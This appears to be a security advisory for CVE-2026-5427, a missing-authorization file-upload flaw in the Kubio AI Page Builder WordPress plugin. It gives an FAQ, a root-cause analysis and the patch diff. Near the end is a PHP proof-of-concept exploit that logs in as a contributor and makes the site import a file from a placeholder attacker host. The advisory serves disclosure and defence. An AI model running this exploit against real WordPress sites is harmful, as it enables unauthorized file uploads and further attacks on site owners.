What is CVE-2026-5427?

CVE-2026-5427 is a medium severity vulnerability in the Kubio AI Page Builder plugin for WordPress. It allows authenticated users with Contributor-level access or higher to upload arbitrary files to the WordPress media library via the REST API due to insufficient authorization checks.

How does the vulnerability work?

The vulnerability exists in the kubio_rest_pre_insert_import_assets() function, which does not properly check if the user has the upload_files capability. This allows an authenticated attacker to create or update posts with block attributes that reference external URLs, leading to unauthorized file uploads.

Who is affected by this vulnerability?

Any WordPress site using the Kubio plugin version 2.7.2 or earlier is affected. Specifically, users with Contributor-level permissions or higher can exploit this vulnerability to upload files.

How can I check if my site is vulnerable?

To determine if your site is vulnerable, check the version of the Kubio plugin installed. If it is version 2.7.2 or earlier, your site is at risk and should be updated immediately.

How can I fix this vulnerability?

The vulnerability has been patched in version 2.7.3 of the Kubio plugin. To fix the issue, update your plugin to the latest version available in the WordPress Plugin Repository.

What does a CVSS score of 5.3 mean?

A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers, potentially leading to unauthorized access or data exposure.

What are the practical risks of this vulnerability?

If exploited, this vulnerability could allow attackers to upload malicious files to your server, which may lead to remote code execution or further attacks. It also allows unauthorized use of server storage resources.

How does the proof of concept demonstrate the vulnerability?

The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to the WordPress REST API. It demonstrates the steps taken to authenticate and upload a file from an external URL, bypassing normal WordPress security checks.

Are there any other mitigation strategies besides updating?

In addition to updating the plugin, consider implementing strict user role management and monitoring for unusual file uploads in your media library. Regular security audits and using security plugins can also help mitigate risks.

What should I do if I cannot update the plugin immediately?

If immediate updating is not possible, consider disabling the Kubio plugin until it can be updated. Additionally, review user roles and permissions to limit access to only those who need it.

How can I stay informed about future vulnerabilities?

To stay informed about vulnerabilities, subscribe to security mailing lists, follow relevant security blogs, and monitor the WordPress security updates page. Regularly check for updates to all plugins and themes.

Where can I find more information about CVE-2026-5427?

More information about CVE-2026-5427 can be found on the National Vulnerability Database (NVD) and security advisories related to the Kubio plugin. These resources provide detailed descriptions and updates regarding the vulnerability.

Atomic Edge Proof of Concept automated generator using AI diff analysis

Published : April 17, 2026

CVE-2026-5427: Kubio AI Page Builder <= 2.7.2 – Missing Authorization to Authenticated (Contributor+) Limited File Upload via Kubio Block Attributes (kubio)

CVE ID CVE-2026-5427

Plugin kubio

Severity Medium (CVSS 5.3)

CWE 862

Vulnerable Version 2.7.2

Patched Version 2.7.3

Disclosed April 15, 2026

Analysis Overview

Atomic Edge analysis of CVE-2026-5427:
The Kubio AI Page Builder WordPress plugin, versions up to and including 2.7.2, contains a missing authorization vulnerability. This flaw allows authenticated attackers with Contributor-level permissions or higher to upload arbitrary files to the WordPress media library via the REST API. The vulnerability bypasses WordPress’s standard upload capability checks, enabling unauthorized file creation and attachment posts.

The root cause is insufficient capability checking in the `kubio_rest_pre_insert_import_assets()` function. This function is hooked to the `rest_pre_insert_cve_proof` filter for posts, pages, templates, and template parts. When a post is created or updated via the REST API, the function in `/kubio/lib/filters/post-insert.php` parses block attributes for URLs within the ‘kubio’ namespace. It automatically imports these URLs via the `importRemoteFile()` method in `/kubio/lib/src/Core/Importer.php` without verifying the user possesses the `upload_files` capability. The vulnerable code path executes before any user permission validation.

Exploitation requires an authenticated attacker with at least Contributor-level access. The attacker sends a POST or PUT request to the WordPress REST API endpoint for creating or updating a post, page, template, or template part. The request body includes post content containing a Kubio block with a ‘kubio’ attribute namespace referencing an external URL. The plugin’s `kubio_rest_pre_insert_import_assets()` function triggers on the `rest_pre_insert_cve_proof` filter, fetches the external file via `importRemoteFile()`, and creates an attachment post in the database, bypassing the `upload_files` capability check.

The patch adds a capability check at the beginning of the `kubio_rest_pre_insert_import_assets()` function in `/kubio/lib/filters/post-insert.php`. The new code verifies `current_user_can(‘upload_files’)` and returns early if the check fails. The patch also adds a similar check in the `maybeImportBlockAssets()` method within `/kubio/lib/src/Core/Importer.php` via a new `canUploadFiles()` helper function. This ensures the file import logic respects WordPress’s permission model both during REST API post insertion and during general block asset processing.

Successful exploitation allows attackers to upload arbitrary files, including potentially malicious scripts, to the WordPress media library. This can lead to remote code execution if the uploaded file is accessible and executable within the web root. The attack also enables unauthorized consumption of server storage resources and could facilitate further server-side attacks by placing controlled files on the target system.

Differential between vulnerable and patched code

Below is a differential between the unpatched vulnerable code and the patched update, for reference.

Code Diff

--- a/kubio/build/block-editor/index.asset.php
+++ b/kubio/build/block-editor/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('kubio-constants', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-rich-text', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => '1f3a0b37498a8dcd8ea5');
+<?php return array('dependencies' => array('kubio-constants', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-blob', 'wp-block-serialization-default-parser', 'wp-blocks', 'wp-commands', 'wp-components', 'wp-compose', 'wp-data', 'wp-date', 'wp-deprecated', 'wp-dom', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-is-shallow-equal', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-notices', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-priority-queue', 'wp-rich-text', 'wp-token-list', 'wp-url', 'wp-warning'), 'version' => '4f8cf8b0e56aa0fddae9');
--- a/kubio/build/block-library/blocks-manifest.php
+++ b/kubio/build/block-library/blocks-manifest.php
@@ -33,29 +33,23 @@
 		),
 		'rel' => 'contact-form/index.php'
 	),
-	'copyright' => array(
-		'classes' => array(
-			'CopyrightBlock'
-		),
-		'rel' => 'copyright/index.php'
-	),
 	'divider' => array(
 		'classes' => array(
 			'DividerBlock'
 		),
 		'rel' => 'divider/index.php'
 	),
-	'footer' => array(
+	'copyright' => array(
 		'classes' => array(
-			'FooterTemplatePart'
+			'CopyrightBlock'
 		),
-		'rel' => 'footer/index.php'
+		'rel' => 'copyright/index.php'
 	),
-	'header' => array(
+	'footer' => array(
 		'classes' => array(
-			'HeaderTemplatePart'
+			'FooterTemplatePart'
 		),
-		'rel' => 'header/index.php'
+		'rel' => 'footer/index.php'
 	),
 	'heading' => array(
 		'classes' => array(
@@ -63,6 +57,12 @@
 		),
 		'rel' => 'heading/index.php'
 	),
+	'header' => array(
+		'classes' => array(
+			'HeaderTemplatePart'
+		),
+		'rel' => 'header/index.php'
+	),
 	'hero' => array(
 		'classes' => array(
 			'HeroBlock'
@@ -112,17 +112,26 @@
 		),
 		'rel' => 'link-group/index.php'
 	),
+	'map' => array(
+		'classes' => array(
+			'MapBlock'
+		),
+		'rel' => 'map/index.php'
+	),
 	'logo' => array(
 		'classes' => array(
 			'LogoBlock'
 		),
 		'rel' => 'logo/index.php'
 	),
-	'map' => array(
+	'navigation' => array(
 		'classes' => array(
-			'MapBlock'
+			'NavigationTopBarBlock',
+			'NavigationSectionBlock',
+			'NavigationItemsBlock',
+			'NavigationStickyItemsBlock'
 		),
-		'rel' => 'map/index.php'
+		'rel' => 'navigation/index.php'
 	),
 	'page-title' => array(
 		'classes' => array(
@@ -136,15 +145,6 @@
 		),
 		'rel' => 'pagination-nav-button/index.php'
 	),
-	'navigation' => array(
-		'classes' => array(
-			'NavigationTopBarBlock',
-			'NavigationSectionBlock',
-			'NavigationItemsBlock',
-			'NavigationStickyItemsBlock'
-		),
-		'rel' => 'navigation/index.php'
-	),
 	'pagination-numbers' => array(
 		'classes' => array(
 			'PaginationNumbersBlock'
@@ -163,24 +163,12 @@
 		),
 		'rel' => 'post-author-bio/index.php'
 	),
-	'post-author-name' => array(
-		'classes' => array(
-			'PostAuthorNameBlock'
-		),
-		'rel' => 'post-author-name/index.php'
-	),
 	'post-categories' => array(
 		'classes' => array(
 			'PostCategoriesBlock'
 		),
 		'rel' => 'post-categories/index.php'
 	),
-	'post-comments' => array(
-		'classes' => array(
-			'PostCommentsBlock'
-		),
-		'rel' => 'post-comments/index.php'
-	),
 	'post-comments-form' => array(
 		'classes' => array(
 			'PostCommentsFormBlock'
@@ -193,23 +181,23 @@
 		),
 		'rel' => 'post-excerpt/index.php'
 	),
-	'post-featured-image' => array(
+	'post-author-name' => array(
 		'classes' => array(
-			'PostFeaturedImageBlock'
+			'PostAuthorNameBlock'
 		),
-		'rel' => 'post-featured-image/index.php'
+		'rel' => 'post-author-name/index.php'
 	),
-	'query-layout' => array(
+	'post-featured-image' => array(
 		'classes' => array(
-			'QueryLayout'
+			'PostFeaturedImageBlock'
 		),
-		'rel' => 'query-layout/index.php'
+		'rel' => 'post-featured-image/index.php'
 	),
-	'post-title' => array(
+	'post-meta' => array(
 		'classes' => array(
-			'PostTitleBlock'
+			'PostMetaBlock'
 		),
-		'rel' => 'post-title/index.php'
+		'rel' => 'post-meta/index.php'
 	),
 	'post-tags' => array(
 		'classes' => array(
@@ -217,23 +205,23 @@
 		),
 		'rel' => 'post-tags/index.php'
 	),
-	'row' => array(
+	'post-title' => array(
 		'classes' => array(
-			'RowBlock'
+			'PostTitleBlock'
 		),
-		'rel' => 'row/index.php'
+		'rel' => 'post-title/index.php'
 	),
-	'read-more-button' => array(
+	'query-layout' => array(
 		'classes' => array(
-			'ReadMorebuttonBlock'
+			'QueryLayout'
 		),
-		'rel' => 'read-more-button/index.php'
+		'rel' => 'query-layout/index.php'
 	),
-	'post-meta' => array(
+	'read-more-button' => array(
 		'classes' => array(
-			'PostMetaBlock'
+			'ReadMorebuttonBlock'
 		),
-		'rel' => 'post-meta/index.php'
+		'rel' => 'read-more-button/index.php'
 	),
 	'query-pagination' => array(
 		'classes' => array(
@@ -241,12 +229,30 @@
 		),
 		'rel' => 'query-pagination/index.php'
 	),
+	'post-comments' => array(
+		'classes' => array(
+			'PostCommentsBlock'
+		),
+		'rel' => 'post-comments/index.php'
+	),
+	'row' => array(
+		'classes' => array(
+			'RowBlock'
+		),
+		'rel' => 'row/index.php'
+	),
 	'search-form' => array(
 		'classes' => array(
 			'SearchForm'
 		),
 		'rel' => 'search-form/index.php'
 	),
+	'section' => array(
+		'classes' => array(
+			'SectionBlock'
+		),
+		'rel' => 'section/index.php'
+	),
 	'shortcode' => array(
 		'classes' => array(
 			'ShortcodeBlock'
@@ -260,11 +266,11 @@
 		),
 		'rel' => 'social-icons/index.php'
 	),
-	'section' => array(
+	'spacer' => array(
 		'classes' => array(
-			'SectionBlock'
+			'SpacerBlock'
 		),
-		'rel' => 'section/index.php'
+		'rel' => 'spacer/index.php'
 	),
 	'sidebar' => array(
 		'classes' => array(
@@ -272,12 +278,6 @@
 		),
 		'rel' => 'sidebar/index.php'
 	),
-	'spacer' => array(
-		'classes' => array(
-			'SpacerBlock'
-		),
-		'rel' => 'spacer/index.php'
-	),
 	'tab' => array(
 		'classes' => array(
 			'TabBlock',
@@ -288,11 +288,11 @@
 		),
 		'rel' => 'tab/index.php'
 	),
-	'widgets-area' => array(
+	'video' => array(
 		'classes' => array(
-			'WidgetAreaBlock'
+			'VideoBlock'
 		),
-		'rel' => 'widgets-area/index.php'
+		'rel' => 'video/index.php'
 	),
 	'text' => array(
 		'classes' => array(
@@ -300,17 +300,11 @@
 		),
 		'rel' => 'text/index.php'
 	),
-	'video' => array(
-		'classes' => array(
-			'VideoBlock'
-		),
-		'rel' => 'video/index.php'
-	),
-	'menu-items' => array(
+	'widgets-area' => array(
 		'classes' => array(
-			'MenuItemsBlock'
+			'WidgetAreaBlock'
 		),
-		'rel' => 'menu/menu-items/index.php'
+		'rel' => 'widgets-area/index.php'
 	),
 	'dropdown-menu' => array(
 		'classes' => array(
@@ -318,6 +312,12 @@
 		),
 		'rel' => 'menu/dropdown-menu/index.php'
 	),
+	'menu-items' => array(
+		'classes' => array(
+			'MenuItemsBlock'
+		),
+		'rel' => 'menu/menu-items/index.php'
+	),
 	'accordion-menu' => array(
 		'classes' => array(
 			'AccordionMenuBlock'
@@ -342,29 +342,23 @@
 		),
 		'rel' => 'accordion/blocks/accordion-item/index.php'
 	),
-	'icon-list' => array(
-		'classes' => array(
-			'IconListBlock'
-		),
-		'rel' => 'icon-list/blocks/icon-list/index.php'
-	),
 	'down-arrow' => array(
 		'classes' => array(
 			'DownArrowBlock'
 		),
 		'rel' => 'hero/blocks/down-arrow/index.php'
 	),
-	'icon-list-item' => array(
+	'icon-list' => array(
 		'classes' => array(
-			'IconListItemBlock'
+			'IconListBlock'
 		),
-		'rel' => 'icon-list/blocks/icon-list-item/index.php'
+		'rel' => 'icon-list/blocks/icon-list/index.php'
 	),
-	'query' => array(
+	'icon-list-item' => array(
 		'classes' => array(
-			'QueryBlock'
+			'IconListItemBlock'
 		),
-		'rel' => 'query/blocks/query/index.php'
+		'rel' => 'icon-list/blocks/icon-list-item/index.php'
 	),
 	'loop' => array(
 		'classes' => array(
@@ -377,5 +371,11 @@
 			'LoopItemBlock'
 		),
 		'rel' => 'query/blocks/loop-item/index.php'
+	),
+	'query' => array(
+		'classes' => array(
+			'QueryBlock'
+		),
+		'rel' => 'query/blocks/query/index.php'
 	)
 );
--- a/kubio/build/controls/index.asset.php
+++ b/kubio/build/controls/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('kubio-constants', 'kubio-core', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-global-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-style-manager', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keycodes', 'wp-media-utils', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-url'), 'version' => 'be645ff1b742686508e1');
+<?php return array('dependencies' => array('kubio-constants', 'kubio-core', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-global-data', 'kubio-icons', 'kubio-log', 'kubio-pro', 'kubio-style-manager', 'kubio-utils', 'lodash', 'react', 'react-dom', 'wp-api-fetch', 'wp-block-editor', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-dom-ready', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keycodes', 'wp-media-utils', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-url'), 'version' => '19d95e23a179b6837293');
--- a/kubio/build/editor/index.asset.php
+++ b/kubio/build/editor/index.asset.php
@@ -1 +1 @@
-<?php return array('dependencies' => array('kubio-advanced-panel', 'kubio-ai', 'kubio-block-library', 'kubio-block-patterns', 'kubio-constants', 'kubio-controls', 'kubio-core', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-global-data', 'kubio-icons', 'kubio-inspectors', 'kubio-log', 'kubio-menu-data', 'kubio-pro', 'kubio-style-manager', 'kubio-utils', 'kubio-wp-global-styles', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-data-controls', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-plugins', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-viewport', 'wp-widgets'), 'version' => '1435e9853ddb6fcbcf09');
+<?php return array('dependencies' => array('kubio-advanced-panel', 'kubio-ai', 'kubio-block-library', 'kubio-block-patterns', 'kubio-constants', 'kubio-controls', 'kubio-core', 'kubio-core-hooks', 'kubio-editor-data', 'kubio-global-data', 'kubio-icons', 'kubio-inspectors', 'kubio-log', 'kubio-menu-data', 'kubio-pro', 'kubio-style-manager', 'kubio-utils', 'kubio-wp-global-styles', 'lodash', 'react', 'react-dom', 'wp-a11y', 'wp-api-fetch', 'wp-block-editor', 'wp-block-library', 'wp-blocks', 'wp-components', 'wp-compose', 'wp-core-data', 'wp-data', 'wp-data-controls', 'wp-deprecated', 'wp-editor', 'wp-element', 'wp-hooks', 'wp-html-entities', 'wp-i18n', 'wp-keyboard-shortcuts', 'wp-keycodes', 'wp-media-utils', 'wp-notices', 'wp-plugins', 'wp-polyfill', 'wp-preferences', 'wp-primitives', 'wp-private-apis', 'wp-url', 'wp-viewport', 'wp-widgets'), 'version' => '47c9505949d2567de5e5');
--- a/kubio/build/third-party-blocks/manifest.php
+++ b/kubio/build/third-party-blocks/manifest.php
@@ -4,13 +4,13 @@

 return array(
 	'core/post-content/support.json',
-	'core/widgets/archives/support.json',
 	'core/widgets/calendar/support.json',
 	'core/widgets/categories/support.json',
+	'core/widgets/archives/support.json',
 	'core/widgets/latest-comments/support.json',
-	'core/widgets/rss/support.json',
-	'core/widgets/page-list/support.json',
 	'core/widgets/latest-posts/support.json',
+	'core/widgets/page-list/support.json',
+	'core/widgets/rss/support.json',
 	'core/widgets/search/support.json',
 	'core/widgets/social-icons/support.json',
 	'core/widgets/tag-cloud/support.json'
--- a/kubio/lib/editor-assets.php
+++ b/kubio/lib/editor-assets.php
@@ -366,7 +366,7 @@
 						'kubioRemoteContent'             => Utils::getSnippetsURL( '/globals' ),
 						'kubioLocalContentFile'          => kubio_url( 'static/patterns/content-converted.json' ),
 						'kubioEditorURL'                 => add_query_arg( 'page', 'kubio', admin_url( 'admin.php' ) ),
-						'showFreeImagesTab'				 => Utils::getIsImageHubPluginActive(),
+						'showFreeImagesTab'              => Utils::getIsImageHubPluginActive(),
 						'patternsOnTheFly'               => ( defined( 'KUBIO_PATTERNS_ON_THE_FLY' ) && KUBIO_PATTERNS_ON_THE_FLY ) ? KUBIO_PATTERNS_ON_THE_FLY : '',
 						'base_url'                       => site_url(),
 						'admin_url'                      => admin_url(),
--- a/kubio/lib/filters/post-insert.php
+++ b/kubio/lib/filters/post-insert.php
@@ -4,7 +4,9 @@
 use KubioCoreUtils;

 function kubio_rest_pre_insert_import_assets( $prepared_post ) {
-
+	if ( ! current_user_can( 'upload_files' ) ) {
+		return $prepared_post;
+	}
 	//if you make changes to the post that does not include it's content. For example featured image, template,
 	// slug etc... . we need to stop the function or the post content will be removed
 	if ( ! isset( $prepared_post->post_content ) ) {
--- a/kubio/lib/kubio-editor.php
+++ b/kubio/lib/kubio-editor.php
@@ -518,7 +518,6 @@
 	$settings['enableFSEBlocks']                       = true;
 	$settings['kubioGlobalSettings']                   = (object) Flags::getSettings();

-
 	// settings for outside Kubio editor
 	// __unstableResolvedAssets was added in WP 6.0
 	if ( isset( $settings['__unstableResolvedAssets'] ) && ! kubio_is_kubio_editor_page() ) {
@@ -572,7 +571,6 @@
 	AssetsDependencyInjector::injectKubioScriptDependencies( 'jquery-masonry', false );

 	do_action( 'kubio/editor/load_gutenberg_assets' );
-
 	wp_enqueue_style( 'kubio-pro' );
 	wp_enqueue_script( 'kubio-block-patterns' );
 	wp_enqueue_script( 'kubio-third-party-blocks' );
@@ -1359,7 +1357,7 @@
 		?>
 		<script>
 			(function() {
-				var kubioBindingSources = JSON.parse('<?php echo wp_kses_post($encoded_data); ?>');
+				var kubioBindingSources = JSON.parse('<?php echo wp_kses_post( $encoded_data ); ?>');

 				let bindingSourcesAreSupported = wp.blocks && wp.blocks.getBlockBindingsSource && wp.blocks.registerBlockBindingsSource;
 				if (!bindingSourcesAreSupported) {
--- a/kubio/lib/src/Core/Importer.php
+++ b/kubio/lib/src/Core/Importer.php
@@ -62,19 +62,20 @@
 		return true;
 	}

-	public static function deleteTemplate($slug) {
+	public static function deleteTemplate( $slug ) {
 		// Query to find the wp_template with slug 'front_page'
-		$query = new WP_Query([
-			'post_type' => 'wp_template',
-			'name' => $slug,
-			'posts_per_page' => 1,
-		]);
+		$query = new WP_Query(
+			array(
+				'post_type'      => 'wp_template',
+				'name'           => $slug,
+				'posts_per_page' => 1,
+			)
+		);

 		if ( $query->have_posts() ) {

 			$template_post = $query->posts[0];

-
 			wp_trash_post( $template_post->ID, true );
 		}
 	}
@@ -402,38 +403,37 @@
 		return $files;
 	}

-	public static function getCachedImportRemoteFileByUrl($source_url) {
+	public static function getCachedImportRemoteFileByUrl( $source_url ) {

-		$files_map = get_transient(static::IMPORT_REMOTE_FILE_TRANSIENT_KEY);
-		if(empty($files_map) || !is_array($files_map)) {
+		$files_map = get_transient( static::IMPORT_REMOTE_FILE_TRANSIENT_KEY );
+		if ( empty( $files_map ) || ! is_array( $files_map ) ) {
 			return null;
 		}
-		$result = isset($files_map[$source_url]) ? $files_map[$source_url] : null;
+		$result = isset( $files_map[ $source_url ] ) ? $files_map[ $source_url ] : null;
 		return $result;
 	}

-	//used for this 	0057827: Images from pexels are duplicated in media library every time you save some changes
-	public static function storeInCacheImportRemoteFileByUrl($source_url, $file) {
-		if(empty($file)) {
+	//used for this     0057827: Images from pexels are duplicated in media library every time you save some changes
+	public static function storeInCacheImportRemoteFileByUrl( $source_url, $file ) {
+		if ( empty( $file ) ) {
 			return;
 		}
-		$files_map = get_transient(static::IMPORT_REMOTE_FILE_TRANSIENT_KEY);
-		if(empty($files_map)) {
-			$files_map = [];
+		$files_map = get_transient( static::IMPORT_REMOTE_FILE_TRANSIENT_KEY );
+		if ( empty( $files_map ) ) {
+			$files_map = array();
 		}
-		$files_map[$source_url] = $file;
+		$files_map[ $source_url ] = $file;

 		//30 minutes in seconds.
 		$time = 30 * 60;
-		set_transient(static::IMPORT_REMOTE_FILE_TRANSIENT_KEY, $files_map, $time);
+		set_transient( static::IMPORT_REMOTE_FILE_TRANSIENT_KEY, $files_map, $time );
 	}
 	public static function importRemoteFile( $source_url ) {
 		require_once ABSPATH . 'wp-admin/includes/media.php';
 		require_once ABSPATH . 'wp-admin/includes/image.php';

-
-		$cached_result = static::getCachedImportRemoteFileByUrl($source_url);
-		if(!empty($cached_result)) {
+		$cached_result = static::getCachedImportRemoteFileByUrl( $source_url );
+		if ( ! empty( $cached_result ) ) {
 			return $cached_result;
 		}
 		if ( apply_filters( 'kubio/importer/disabled-import-remote-file', false ) ) {
@@ -554,7 +554,7 @@
 				'id'  => intval( $post_id ),
 				'url' => $upload['url'],
 			);
-			static::storeInCacheImportRemoteFileByUrl($source_url, $result);
+			static::storeInCacheImportRemoteFileByUrl( $source_url, $result );
 			$imported_files[ $source_url ] = $result;

 			return $result;
@@ -650,6 +650,10 @@

 	public static function maybeImportBlockAssets( $blocks, $on_time_expired = null ) {

+		if ( ! static::canUploadFiles() ) {
+			return $blocks;
+		}
+
 		require_once KUBIO_ROOT_DIR . '/lib/importer/assets-importer-filters.php';

 		foreach ( $blocks as $index => $block ) {
@@ -666,6 +670,17 @@
 		return $blocks;
 	}

+	private static function canUploadFiles() {
+
+		if ( defined( 'WP_CLI' ) && WP_CLI ) {
+			return true;
+		}
+
+		$current_user = wp_get_current_user();
+
+		return user_can( $current_user, 'upload_files' );
+	}
+
 	public static function setBlocksLocks( $blocks, $value = null ) {

 		require_once KUBIO_ROOT_DIR . '/lib/importer/assets-importer-filters.php';
--- a/kubio/plugin.php
+++ b/kubio/plugin.php
@@ -6,7 +6,7 @@
  * Description: Using the power of AI, Kubio gives you a head start by generating a first draft of your website, which you can further customize to your liking.
  * Author: ExtendThemes
  * Author URI: https://extendthemes.com
- * Version: 2.7.2
+ * Version: 2.7.3
  * License: GPL3+
  * License URI: https://www.gnu.org/licenses/gpl-2.0.txt
  * Text Domain: kubio
@@ -50,8 +50,8 @@
 	return;
 }

-define( 'KUBIO_VERSION', '2.7.2' );
-define( 'KUBIO_BUILD_NUMBER', '471' );
+define( 'KUBIO_VERSION', '2.7.3' );
+define( 'KUBIO_BUILD_NUMBER', '481' );

 define( 'KUBIO_ENTRY_FILE', __FILE__ );
 define( 'KUBIO_ROOT_DIR', plugin_dir_path( __FILE__ ) );

Proof of Concept (PHP)

NOTICE :

This proof-of-concept is provided for educational and authorized security research purposes only.

You may not use this code against any system, application, or network without explicit prior authorization from the system owner.

Unauthorized access, testing, or interference with systems may violate applicable laws and regulations in your jurisdiction.

This code is intended solely to illustrate the nature of a publicly disclosed vulnerability in a controlled environment and may be incomplete, unsafe, or unsuitable for real-world use.

By accessing or using this information, you acknowledge that you are solely responsible for your actions and compliance with applicable laws.

PHP PoC

// ==========================================================================
// Atomic Edge CVE Research | https://atomicedge.io
// Copyright (c) Atomic Edge. All rights reserved.
//
// LEGAL DISCLAIMER:
// This proof-of-concept is provided for authorized security testing and
// educational purposes only. Use of this code against systems without
// explicit written permission from the system owner is prohibited and may
// violate applicable laws including the Computer Fraud and Abuse Act (USA),
// Criminal Code s.342.1 (Canada), and the EU NIS2 Directive / national
// computer misuse statutes. This code is provided "AS IS" without warranty
// of any kind. Atomic Edge and its authors accept no liability for misuse,
// damages, or legal consequences arising from the use of this code. You are
// solely responsible for ensuring compliance with all applicable laws in
// your jurisdiction before use.
// ==========================================================================
// Atomic Edge CVE Research - Proof of Concept
// CVE-2026-5427 - Kubio AI Page Builder <= 2.7.2 - Missing Authorization to Authenticated (Contributor+) Limited File Upload via Kubio Block Attributes

<?php

$target_url = 'https://example.com/wp-json/wp/v2/posts';
$username = 'contributor';
$password = 'password';
$external_file_url = 'https://attacker.com/malicious.jpg';

// Step 1: Authenticate with WordPress REST API
$auth_url = str_replace('/wp-json/wp/v2/posts', '/wp-json/jwt-auth/v1/token', $target_url);
$auth_data = array('username' => $username, 'password' => $password);

$ch = curl_init($auth_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($auth_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array('Content-Type: application/json'));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code !== 200) {
    die("Authentication failed. Check credentials and JWT plugin availability.n");
}

$auth_result = json_decode($response, true);
$token = $auth_result['token'] ?? '';

if (empty($token)) {
    die("Could not retrieve JWT token.n");
}

// Step 2: Create a post with Kubio block containing external URL reference
$post_data = array(
    'title' => 'Exploit Post',
    'status' => 'draft',
    'content' => '<!-- wp:kubio/heading {"kubio":{"backgroundImage":{"url":"' . $external_file_url . '"}}} --><h2>Test</h2><!-- /wp:kubio/heading -->',
    'kubio' => array('backgroundImage' => array('url' => $external_file_url))
);

$ch = curl_init($target_url);
curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, json_encode($post_data));
curl_setopt($ch, CURLOPT_HTTPHEADER, array(
    'Content-Type: application/json',
    'Authorization: Bearer ' . $token
));
$response = curl_exec($ch);
$http_code = curl_getinfo($ch, CURLINFO_HTTP_CODE);
curl_close($ch);

if ($http_code === 201) {
    echo "Post created successfully. The external file at $external_file_url should have been imported to the media library.n";
    $post = json_decode($response, true);
    echo "Post ID: " . ($post['id'] ?? 'Unknown') . "n";
} else {
    echo "Failed to create post. HTTP Code: $http_coden";
    echo "Response: $responsen";
}

?>

Frequently Asked Questions

What is CVE-2026-5427?
Overview of the vulnerability
CVE-2026-5427 is a medium severity vulnerability in the Kubio AI Page Builder plugin for WordPress. It allows authenticated users with Contributor-level access or higher to upload arbitrary files to the WordPress media library via the REST API due to insufficient authorization checks.
How does the vulnerability work?
Mechanism of exploitation
The vulnerability exists in the kubio_rest_pre_insert_import_assets() function, which does not properly check if the user has the upload_files capability. This allows an authenticated attacker to create or update posts with block attributes that reference external URLs, leading to unauthorized file uploads.
Who is affected by this vulnerability?
Identifying at-risk users
Any WordPress site using the Kubio plugin version 2.7.2 or earlier is affected. Specifically, users with Contributor-level permissions or higher can exploit this vulnerability to upload files.
How can I check if my site is vulnerable?
Verifying plugin version
To determine if your site is vulnerable, check the version of the Kubio plugin installed. If it is version 2.7.2 or earlier, your site is at risk and should be updated immediately.
How can I fix this vulnerability?
Updating the plugin
The vulnerability has been patched in version 2.7.3 of the Kubio plugin. To fix the issue, update your plugin to the latest version available in the WordPress Plugin Repository.
What does a CVSS score of 5.3 mean?
Understanding risk levels
A CVSS score of 5.3 indicates a medium severity vulnerability. This means that while the vulnerability is not critical, it poses a significant risk that could be exploited by attackers, potentially leading to unauthorized access or data exposure.
What are the practical risks of this vulnerability?
Potential consequences of exploitation
If exploited, this vulnerability could allow attackers to upload malicious files to your server, which may lead to remote code execution or further attacks. It also allows unauthorized use of server storage resources.
How does the proof of concept demonstrate the vulnerability?
Technical demonstration
The proof of concept provided shows how an authenticated user can exploit the vulnerability by sending a crafted request to the WordPress REST API. It demonstrates the steps taken to authenticate and upload a file from an external URL, bypassing normal WordPress security checks.
Are there any other mitigation strategies besides updating?
Additional security measures
In addition to updating the plugin, consider implementing strict user role management and monitoring for unusual file uploads in your media library. Regular security audits and using security plugins can also help mitigate risks.
What should I do if I cannot update the plugin immediately?
Temporary measures
If immediate updating is not possible, consider disabling the Kubio plugin until it can be updated. Additionally, review user roles and permissions to limit access to only those who need it.
